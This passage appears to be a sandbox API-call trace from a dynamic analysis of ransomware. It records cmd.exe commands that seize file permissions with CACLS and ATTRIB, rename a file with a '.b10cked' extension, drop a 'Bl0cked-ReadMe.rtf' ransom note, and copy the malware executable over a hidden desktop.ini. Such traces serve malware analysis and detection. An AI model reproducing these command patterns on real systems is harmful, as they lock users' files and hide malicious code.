Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, 
hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0x170, dwThreadId=0xcf8)) returned 1 [0150.245] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0150.525] CloseHandle (hObject=0x110) returned 1 [0150.525] CloseHandle (hObject=0x114) returned 1 [0150.525] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.525] ReleaseMutex (hMutex=0xf8) returned 1 [0150.525] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.525] ReleaseMutex (hMutex=0xf8) returned 1 [0150.525] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.525] ReleaseMutex (hMutex=0xf8) returned 1 [0150.525] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.526] ReleaseMutex (hMutex=0xf8) returned 1 [0150.526] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0150.526] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", lpFilePart=0x12eab4*="watermark.png") returned 0x65 [0150.526] GetLastError () returned 0x5 [0150.526] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0150.526] LocalFree (hMem=0x1c6cc8) returned 0x0 [0150.526] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0150.526] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0150.526] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0150.526] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0150.526] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0150.526] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0150.526] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\", cchCount2=88) returned 2 [0150.526] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.526] ReleaseMutex (hMutex=0xf8) returned 1 [0150.526] WaitForSingleObject 
(hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.526] ReleaseMutex (hMutex=0xf8) returned 1 [0150.526] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.526] ReleaseMutex (hMutex=0xf8) returned 1 [0150.527] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0150.527] ReleaseMutex (hMutex=0xf8) returned 1 [0150.527] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20731612062) returned 1 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3a7c [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.527] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, 
lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3594 [0150.528] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3a7c [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3a7c [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0150.530] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1d3d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: 
lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1d3d, lpOverlapped=0x0) returned 1 [0150.531] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0150.531] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1d3d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1d3d, lpOverlapped=0x0) returned 1 [0150.531] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7485, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1d3f [0150.531] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1d3d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1d3d, lpOverlapped=0x0) returned 1 [0150.531] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7485, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1d3f [0150.531] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1d3d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1d3d, lpOverlapped=0x0) returned 1 [0150.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Active.GRL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0150.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Active.GRL", cchWideChar=10, lpMultiByteStr=0x131326c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Active.GRL", lpUsedDefaultChar=0x0) returned 10 [0150.535] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3a7c 
[0150.535] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0150.535] CloseHandle (hObject=0x114) returned 1 [0150.536] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL") returned 0x28 [0150.537] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\") returned 0x1e [0150.537] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xcdc, dwThreadId=0x188)) returned 1 [0150.539] CloseHandle (hObject=0x110) returned 1 [0150.539] CloseHandle (hObject=0x114) returned 1 [0150.539] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\", cchLength=0x20 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\") returned 0x20 [0150.539] CharUpperBuffW (in: lpsz="C:\\Users\\All 
Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0150.539] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\", cchCount1=32, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\", cchCount2=88) returned 3 [0150.539] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\", cchLength=0x20 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\") returned 0x20 [0150.539] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0150.539] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\", cchCount1=32, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0150.539] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0150.540] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0150.540] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0150.540] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\") returned 0x1e [0150.540] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0150.540] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") 
returned 0x9 [0150.540] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xc3c, dwThreadId=0xd00)) returned 1 [0150.541] CloseHandle (hObject=0x110) returned 1 [0150.541] CloseHandle (hObject=0x114) returned 1 [0150.541] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\mf\\bl0cked-readme.rtf")) returned 0xffffffff [0150.542] GetLastError () returned 0x2 [0150.542] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\MF\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\mf\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0150.545] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\mf\\bl0cked-readme.rtf")) returned 0x2020 [0150.545] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0150.545] 
FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MF", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0150.545] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0150.545] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0150.545] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0150.546] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0150.546] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0150.546] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\") returned 0x1e [0150.546] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0150.546] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0150.546] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF", lpszShortPath=0x123003c, cchBuffer=0x103 
| out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF") returned 0x1d [0150.546] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x132 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\MF\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\MF\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\MF\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\MF\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x132 [0150.546] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0150.547] CreateProcessW (in: 